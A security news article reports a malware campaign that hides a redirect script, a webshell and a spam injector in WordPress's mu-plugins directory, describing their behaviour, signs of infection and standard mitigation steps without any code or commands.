Threat Actors Hide Malware in WordPress Sites to Execute Remote Code

Security researchers have uncovered a sophisticated malware campaign targeting WordPress websites by exploiting the Must-Use Plugins (mu-plugins) directory.

This directory, designed to automatically load plugins without requiring activation, has become a prime target for attackers due to its obscurity and lack of visibility in the standard WordPress plugin interface.

Malware Variants and Techniques

Three distinct malware variants have been identified within the mu-plugins directory, each employing unique techniques to compromise websites:

1. Fake Update Redirect Malware: Found in wp-content/mu-plugins/redirect.php, this malware redirects site visitors to malicious external websites. It selectively targets regular visitors while avoiding detection by bots and privileged users, ensuring its persistence.
2. Webshell for Remote Code Execution: Disguised as a legitimate plugin in wp-content/mu-plugins/index.php, this script enables attackers to execute arbitrary code on the server. By dynamically fetching and running external PHP scripts, it allows attackers to inject new malware without modifying the original file.
3. Spam Injector: A script located in wp-content/mu-plugins/custom-js-loader.php injects spam content and manipulates website elements. It replaces images with explicit content and hijacks outbound links, redirecting users to malicious sites.

Administrators can detect these infections through several signs, such as unauthorized redirections, unusual server resource usage, unexpected file modifications, or the presence of suspicious files in the mu-plugins directory.

According to the Report, these files often mimic legitimate plugins, making them harder to identify during routine checks.

Impact on Websites

The consequences of these infections are severe:

• Redirect Malware: Exposes users to harmful content, damages website reputation, and reduces traffic.
• Webshell: Grants attackers full control over the site, enabling data theft, malware distribution, and persistent backdoors.
• Spam Injector: Tarnishes the site’s reputation by displaying explicit content and redirecting users to spam or malicious websites.

These attacks highlight the financial motives of threat actors, who leverage compromised sites for SEO manipulation, data theft, and monetization through malicious advertisements.

The malware likely infiltrates sites through outdated plugins or themes, compromised admin credentials, or poorly secured hosting environments.

Once installed in the mu-plugins directory, it ensures automatic execution with WordPress, complicating detection and removal.

To mitigate risks:

• Regularly scan for malicious files in critical directories.
• Update WordPress core, plugins, and themes.
• Enable two-factor authentication (2FA) for admin accounts.
• Use security plugins to monitor file integrity and detect unauthorized changes.

The exploitation of the mu-plugins directory underscores the evolving tactics of cybercriminals targeting WordPress platforms.

Proactive security measures such as regular monitoring and robust access controls are essential to safeguarding websites against these persistent threats.

Find this Story Interesting! Follow us on LinkedIn, and X to Get More Instant Updates